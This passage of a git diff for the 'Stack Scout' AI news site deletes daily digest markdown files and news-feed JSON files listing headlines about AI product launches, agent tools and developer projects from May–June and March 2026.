- ---- - -## [Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes](https://x.com/_adishj/status/2060028771399500237) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: api_update, product_launch, tool_update - -> Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows. - ---- - -## [X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI](https://www.digg.com/ai/v4d0ka2f) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks](https://www.digg.com/ai/6gzrebez) -*Digg AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages](https://x.com/Carles_Reina/status/2060035887946248616) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> ElevenLabs introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon. - ---- - -## [Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit](https://x.com/kunalbhatia91/status/2060013228231725092) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: product_launch, open_source - -> Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views. 
- ---- - -## [Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era](https://x.com/bercankilic/status/2060043312606638245) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. The launch includes free home cleaning as the entry product. - ---- - -## [minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models](https://paperswithcode.com/papers/2605.30263) -*Papers With Code* | Score: 0.90 -Tags: open_source, developer_tool - ---- - -## [DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch systemIt maps out self-improvement methods like STaR and o1.](https://www.digg.com/ai/xay55qwq) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio](https://www.digg.com/ai/hsa7ykbd) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [OpenAI launches Rosalind Biodefense, giving U.S. 
government agencies access to its specialized GPT-Rosalind modelThe initiative focuses on defending against engineered pathogens.](https://www.digg.com/ai/dl0e6ofa) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7](https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold](https://x.com/Mho_23/status/2048507307466658062) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: developer_tool - -> AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation. - ---- - -## [Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption](https://x.com/garrytan/status/2052434681363321056) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: open_source - -> Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure. 
- ---- - diff --git a/data/digest-2026-05-30.md b/data/digest-2026-05-30.md deleted file mode 100644 index 41a7fd5..0000000 --- a/data/digest-2026-05-30.md +++ /dev/null @@ -1,103 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-30** | 15 stories | Auto-generated from 214 archived stories - ---- - -## [Show HN: VT Code – open-source terminal coding agent in Rust](https://github.com/vinhnx/VTCode) -*Hacker News* | 30/05/2026 | Score: 0.82 -Tags: open_source, cli_tool, agent_tool - ---- - -## [OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devicesA new profile interface tracks token activity and usage statistics.](https://www.digg.com/ai/2cvxmdwh) -*Digg AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399](https://ouraring.com/blog/oura-ring-5) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399. 
- ---- - -## [Cursor Releases Developer Habits Report on AI Coding Trends](https://www.digg.com/ai/6jh7d90b) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking](https://www.digg.com/ai/9jzt6gwc) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Shift Launches Free NYC Cleaning to Gather Robotics Training Data](https://www.digg.com/ai/5ol0wuf6) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing](https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: product_launch - -> Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation. - ---- - -## [Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes Enterprise AI Cost Controls Gap](https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: api_update - -> An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk. 
- ---- - -## [Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'](https://x.com/jarredsumner/status/2060XXX) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: agent_tool - -> Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing. - ---- - -## [wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack](https://github.com/wolfSSL/wolfCOSE) -*Hacker News* | 30/05/2026 | Score: 0.94 -Tags: product_launch - ---- - -## [OpenAI Extends Codex Computer Use To Windows](https://www.digg.com/ai/24n5kcme) -*Digg AI* | Score: 0.94 -Tags: agent_tool - ---- - -## [Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data](https://www.digg.com/ai/hqutws0i) -*Digg AI* | Score: 0.94 -Tags: product_launch - ---- - -## [Kore: Binary File Format Optimized for Modern Data Systems (Open Source)](https://github.com/arunkatherashala/Kore) -*Hacker News* | 30/05/2026 | Score: 0.89 -Tags: open_source - ---- - -## [ChatGPT — Release Notes](https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.) 
-*The Verge AI* | Score: 0.76 -Tags: tool_update - ---- - -## [Show HN: Open Envelope – an open schema for defining AI agent teams](https://openenvelope.org/docs/schema/) -*Hacker News* | 28/05/2026 | Score: 0.75 -Tags: agent_tool - ---- - diff --git a/data/digest-2026-05-31.md b/data/digest-2026-05-31.md deleted file mode 100644 index a10904c..0000000 --- a/data/digest-2026-05-31.md +++ /dev/null @@ -1,11 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-31** | 1 stories | Auto-generated from 98 archived stories - ---- - -## [Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal](https://github.com/marekkowalczyk/breathe-cli) -*Hacker News* | 30/05/2026 | Score: 0.77 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-06-01.md b/data/digest-2026-06-01.md deleted file mode 100644 index 11d154f..0000000 --- a/data/digest-2026-06-01.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-01** | 5 stories | Auto-generated from 220 archived stories - ---- - -## [Nvidia announces new AI chip for personal computers](https://www.bbc.com/news/articles/crmp9mppvzro) -*Hacker News* | 01/06/2026 | Score: 1.00 -Tags: product_launch - ---- - -## [AI Agent Guidelines for CS336 at Stanford](https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md) -*Hacker News* | 01/06/2026 | Score: 0.91 -Tags: agent_tool - ---- - -## [OpenAI frontier models and Codex are now available on AWS](https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/) -*Hacker News* | 01/06/2026 | Score: 0.83 -Tags: product_launch - ---- - -## [Malicious npm packages detected across Red Hat Cloud Services](https://github.com/RedHatInsights/javascript-clients/issues/492) -*Hacker News* | 01/06/2026 | Score: 0.83 -Tags: cli_tool - ---- - -## [Movwin: My (Unpublished) TUI Framework](https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html) -*Hacker News* | 30/05/2026 | Score: 0.77 -Tags: developer_tool - ---- - diff --git 
a/data/digest-2026-06-02.md b/data/digest-2026-06-02.md deleted file mode 100644 index 9756289..0000000 --- a/data/digest-2026-06-02.md +++ /dev/null @@ -1,29 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-02** | 4 stories | Auto-generated from 241 archived stories - ---- - -## [Microsoft announces Scout, an autonomous AI agent built on OpenClaw](https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html) -*Hacker News* | 02/06/2026 | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Alphabet announces $80B equity capital raise to expand AI infra and compute](https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx) -*Hacker News* | 01/06/2026 | Score: 1.00 -Tags: product_launch - ---- - -## [HP re-releases classic computer science calculator: The HP-16C](https://hpcalcs.com/product/hp-16c-collectors-edition/) -*Hacker News* | 02/06/2026 | Score: 0.94 -Tags: product_launch - ---- - -## [Apple rejected my dictation app for using the accessibility API](https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/) -*Hacker News* | 02/06/2026 | Score: 0.86 -Tags: api_update - ---- - diff --git a/data/digest-2026-06-03.md b/data/digest-2026-06-03.md deleted file mode 100644 index 5dbd671..0000000 --- a/data/digest-2026-06-03.md +++ /dev/null @@ -1,41 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-03** | 6 stories | Auto-generated from 269 archived stories - ---- - -## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) -*Hacker News* | 03/06/2026 | Score: 0.82 -Tags: api_update, developer_tool - ---- - -## [Gooey: A GPU-accelerated UI framework for Zig](https://github.com/duanebester/gooey) -*Hacker News* | 03/06/2026 | Score: 0.94 -Tags: developer_tool - ---- - -## [Capstone – multi-platform, multi-architecture disassembly 
framework](https://www.capstone-engine.org/) -*Hacker News* | 03/06/2026 | Score: 0.94 -Tags: developer_tool - ---- - -## [Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers](https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai) -*Hacker News* | 03/06/2026 | Score: 0.89 -Tags: open_source - ---- - -## [Roku LT Operating System open source distribution](https://blog.roku.com/developer/roku-lt-os) -*Hacker News* | 03/06/2026 | Score: 0.86 -Tags: open_source - ---- - -## [Journey to JPEG XL: open-source experiments shaped the future of image coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) -*Hacker News* | 03/06/2026 | Score: 0.66 -Tags: open_source - ---- - diff --git a/data/digest-2026-06-04.md b/data/digest-2026-06-04.md deleted file mode 100644 index 0ee2879..0000000 --- a/data/digest-2026-06-04.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-04** | 5 stories | Auto-generated from 224 recent stories - ---- - -## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) -*Hacker News* | 04/06/2026 | Score: 0.56 -Tags: open_source, developer_tool - ---- - -## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) -*Hacker News* | 03/06/2026 | Score: 0.56 -Tags: api_update, developer_tool - ---- - -## [Show HN: Open Terminal – A Bloomberg Style App for Research](https://tesseractanalytics.ai/) -*Hacker News* | 04/06/2026 | Score: 0.56 -Tags: cli_tool - ---- - -## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) -*Hacker News* | 04/06/2026 | Score: 0.48 -Tags: tool_update - ---- - -## [Journey to JPEG XL: open-source experiments shaped the future of image 
coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) -*Hacker News* | 03/06/2026 | Score: 0.48 -Tags: open_source - ---- - diff --git a/data/digest-2026-06-05.md b/data/digest-2026-06-05.md deleted file mode 100644 index 7509375..0000000 --- a/data/digest-2026-06-05.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-05** | 5 stories | Auto-generated from 186 recent stories - ---- - -## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) -*Hacker News* | 04/06/2026 | Score: 0.56 -Tags: open_source, developer_tool - ---- - -## [Open Code Review – An AI-powered code review CLI tool](https://github.com/alibaba/open-code-review) -*Hacker News* | 05/06/2026 | Score: 0.48 -Tags: cli_tool - ---- - -## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) -*Hacker News* | 04/06/2026 | Score: 0.48 -Tags: tool_update - ---- - -## [databow: a Rust CLI to query any database with an ADBC driver](https://columnar.tech/blog/introducing-databow//) -*Hacker News* | 03/06/2026 | Score: 0.48 -Tags: cli_tool - ---- - -## [Branchless Quicksort faster than std:sort and pdqsort with C and C++ API](https://tiki.li/blog/blqsort) -*Hacker News* | 02/06/2026 | Score: 0.48 -Tags: api_update - ---- - diff --git a/data/digest-2026-06-06.md b/data/digest-2026-06-06.md deleted file mode 100644 index ac59722..0000000 --- a/data/digest-2026-06-06.md +++ /dev/null @@ -1,5 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-06** | 0 stories | Auto-generated from 138 recent stories - ---- - diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index 0f23911..f57652d 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-06-06", - 
"updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "thesis": "Stack Scout is a public guide, not a benchmark lab. We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/news-feed-2026-03-15.json b/data/news-feed-2026-03-15.json deleted file mode 100644 index 86e7524..0000000 --- a/data/news-feed-2026-03-15.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "generated": "2026-06-05T00:44:28.529Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-15", - "article_count": 3, - "archived_story_count": 55, - "articles": [ - { - "title": "Show HN: Open-source playground to red-team AI agents with exploits published", - "url": "https://github.com/fabraix/playground", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8799999999999999, - "date": "2026-03-15T22:29:46.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Chrome DevTools MCP (2025)", - "url": "https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session", - "source": "Hacker News", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 0.81, - "date": "2026-03-15T19:12:53.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Office.eu launches as Europe's sovereign office platform", - "url": "https://office.eu/media/pressrelease-20260304", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.7599999999999999, - "date": "2026-03-15T18:22:36.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-16.json b/data/news-feed-2026-03-16.json deleted file mode 100644 index f7b30f3..0000000 --- a/data/news-feed-2026-03-16.json +++ /dev/null 
@@ -1,134 +0,0 @@ -{ - "generated": "2026-06-05T00:44:28.694Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-16", - "article_count": 8, - "archived_story_count": 67, - "articles": [ - { - "title": "Apideck CLI – An AI-agent interface with much lower context consumption than MCP", - "url": "https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative", - "source": "Hacker News", - "tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-03-16T15:25:36.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Speed at the cost of quality: Study of use of Cursor AI in open source projects", - "url": "https://arxiv.org/abs/2511.04427", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.87, - "date": "2026-03-16T17:07:37.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nvidia Launches Vera CPU, Purpose-Built for Agentic AI", - "url": "https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.84, - "date": "2026-03-16T20:01:02.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nango (YC W23, API Access for Agents and Apps) Is Hiring", - "url": "https://jobs.ashbyhq.com/Nango", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.82, - "date": "2026-03-16T12:03:13.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "SpiceCrypt: A Python library for decrypting LTspice encrypted model files", - "url": "https://github.com/jtsylve/spice-crypt", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - 
], - "importance": 0.7599999999999999, - "date": "2026-03-15T07:11:32.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Event Publisher enables event integration between Keycloak and OpenFGA", - "url": "https://github.com/embesozzi/keycloak-openfga-event-publisher", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7, - "date": "2026-03-16T14:21:07.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Lazycut: A simple terminal video trimmer using FFmpeg", - "url": "https://github.com/emin-ozata/lazycut", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-16T12:05:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Leanstral: Open-source agent for trustworthy coding and formal proof engineering", - "url": "https://mistral.ai/news/leanstral", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-16T20:59:40.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-17.json b/data/news-feed-2026-03-17.json deleted file mode 100644 index 56073d6..0000000 --- a/data/news-feed-2026-03-17.json +++ /dev/null @@ -1,237 +0,0 @@ -{ - "generated": "2026-06-05T00:44:28.931Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-17", - "article_count": 15, - "archived_story_count": 140, - "articles": [ - { - "title": "Show HN: Crust – A CLI framework for TypeScript and Bun", - "url": "https://github.com/chenxin-yan/crust", - "source": "Hacker News", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-03-17T04:43:29.000Z", - "summary": null, - "category": 
"tech_general" - }, - { - "title": "World launches tool to verify humans behind AI shopping agents", - "url": "https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-17T15:00:00.000Z", - "summary": "As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce.", - "category": "ai_tools" - }, - { - "title": "Picsart now allows creators to ‘hire’ AI assistants through agent marketplace", - "url": "https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/", - "source": "TechCrunch AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-03-17T04:01:00.000Z", - "summary": "Picsart's AI agent marketplace will launch with four agents, then add more agents each week.", - "category": "ai_tools" - }, - { - "title": "Nvidia’s version of OpenClaw could solve its biggest problem: security", - "url": "https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/", - "source": "TechCrunch AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-03-16T22:45:51.000Z", - "summary": "Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw.", - "category": "ai_tools" - }, - { - "title": "How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect", - "url": "https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-16T17:51:46.000Z", - "summary": "GTC is 
Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI.", - "category": "ai_tools" - }, - { - "title": "China’s OpenClaw Boom Is a Gold Rush for AI Companies", - "url": "https://www.wired.com/story/china-is-going-all-in-on-openclaw/", - "source": "Wired AI", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.9099999999999999, - "date": "2026-03-13T12:00:00.000Z", - "summary": "Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies.", - "category": "ai_tools" - }, - { - "title": "Mistral AI Releases Forge", - "url": "https://mistral.ai/news/forge", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.79, - "date": "2026-03-17T21:04:26.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust", - "url": "https://github.com/peters/horizon", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.78, - "date": "2026-03-17T18:14:24.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Chrome extension adjusts video speed based on how fast the speaker is talking", - "url": "https://github.com/ywong137/speech-speed", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.78, - "date": "2026-03-13T06:18:17.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name", - "url": 
"https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/", - "source": "Ars Technica AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.78, - "date": "2026-02-13T19:40:21.000Z", - "summary": "This story has been retracted", - "category": "tech_general" - }, - { - "title": "Node.js needs a virtual file system", - "url": "https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-17T14:28:37.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Kagi Translate now supports LinkedIn Speak as an output language", - "url": "https://translate.kagi.com/?from=en&to=LinkedIn+speak", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7, - "date": "2026-03-17T04:39:42.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Reverse-engineering Viktor and making it Open Source", - "url": "https://matijacniacki.com/blog/openviktor", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-17T08:15:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Building a Shell", - "url": "https://healeycodes.com/building-a-shell", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-17T09:52:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Droeftoeter, a Terminal Coding Toy", - "url": "https://github.com/whtspc/droeftoeter", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-13T04:16:26.000Z", - 
"summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-18.json b/data/news-feed-2026-03-18.json deleted file mode 100644 index bceb1ea..0000000 --- a/data/news-feed-2026-03-18.json +++ /dev/null @@ -1,160 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.089Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-18", - "article_count": 10, - "archived_story_count": 90, - "articles": [ - { - "title": "The leaderboard “you can’t game,” funded by the companies it ranks", - "url": "https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-18T16:30:00.000Z", - "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […]", - "category": "ai_tools" - }, - { - "title": "The PhD students who became the judges of the AI industry", - "url": "https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-18T15:00:00.000Z", - "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. 
In just seven months, the startup went from a UC Berkeley PhD research […]", - "category": "ai_tools" - }, - { - "title": "Meta is having trouble with rogue AI agents", - "url": "https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/", - "source": "TechCrunch AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.99, - "date": "2026-03-18T23:42:46.000Z", - "summary": "A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it.", - "category": "ai_tools" - }, - { - "title": "Launch an autonomous AI agent with sandboxed execution in 2 lines of code", - "url": "https://amaiya.github.io/onprem/examples_agent.html", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.98, - "date": "2026-03-18T01:10:19.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nightingale – open-source karaoke app that works with any song on your computer", - "url": "https://nightingale.cafe/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7599999999999999, - "date": "2026-03-18T08:06:24.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "A ngrok-style secure tunnel server written in Rust and Open Source", - "url": "https://github.com/joaoh82/rustunnel", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.71, - "date": "2026-03-18T14:00:43.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Tmux-IDE, OSS agent-first terminal IDE", - "url": "https://tmux.thijsverreck.com", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-18T17:46:25.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": 
